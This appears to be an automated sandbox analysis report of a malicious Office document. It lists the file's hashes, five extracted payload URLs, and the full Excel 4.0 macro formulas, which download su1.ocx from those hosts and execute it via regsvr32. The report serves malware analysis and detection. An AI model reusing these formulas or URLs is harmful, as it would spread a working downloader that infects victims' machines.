General
-
Target
ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9
-
Size
91KB
-
MD5
2c92174799a0211bee713736f553f677
-
SHA1
d7be5aa1357bdd94badfdee29ec70cb33ae001cd
-
SHA256
ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9
-
SHA512
49c083e18e034627421763d4bc9bb4fa731841023439c3cf92df20aa35e2405d61edb175fd5f5f839ae145124c3502887fe070e38f9cfc1d7095c576f0d958f0
-
SSDEEP
1536:syx1gX2hnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0Hi:syDm2hyVEoBo6hKb4llGsQjbxoi
Malware Config
Extracted
https://ajmotorsshop.com/grad-ooze/O/
https://msubrahm.com/wp-admin/5SjBp9WHfGbtgY/
http://moveconnects.com/item-immo/5NAtMXXCkzQ5NrX3z/9moeTie4vHJ/
http://beta2.emeritus.org/wp-content.previous/WS0O/
https://karmapedia.com/wp-includes/edvf/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ajmotorsshop.com/grad-ooze/O/","..\su1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://msubrahm.com/wp-admin/5SjBp9WHfGbtgY/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/item-immo/5NAtMXXCkzQ5NrX3z/9moeTie4vHJ/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://beta2.emeritus.org/wp-content.previous/WS0O/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://karmapedia.com/wp-includes/edvf/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\su1.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9